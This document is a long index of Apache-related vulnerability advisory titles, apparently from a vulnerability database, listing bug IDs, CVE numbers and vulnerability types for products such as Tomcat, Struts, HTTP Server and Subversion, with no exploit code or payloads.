| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
| [76933] Apache James Server Unspecified Command Execution Vulnerability
| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
| [68229] Apache Harmony PRNG Entropy Weakness
| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
| [64780] Apache CloudStack Unauthorized Access Vulnerability
| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
| [59670] Apache VCL Multiple Input Validation Vulnerabilities
| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
| [54798] Apache Libcloud Man In The Middle Vulnerability
| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
| [54189] Apache Roller Cross Site Request Forgery Vulnerability
| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
| [53880] Apache CXF Child Policies Security Bypass Vulnerability
| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
6371| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
6372| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
6373| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
6374| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
6375| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
6376| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
6377| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
6378| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
6379| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
6380| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
6381| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
6382| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
6383| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
6384| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
6385| [49290] Apache Wicket Cross Site Scripting Vulnerability
6386| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
6387| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
6388| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
6389| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
6390| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
6391| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
6392| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
6393| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
6394| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
6395| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
6396| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
6397| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
6398| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
6399| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
6400| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
6401| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
6402| [46953] Apache MPM-ITK Module Security Weakness
6403| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
6404| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
6405| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
6406| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
6407| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
6408| [46166] Apache Tomcat JVM Denial of Service Vulnerability
6409| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
6410| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
6411| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
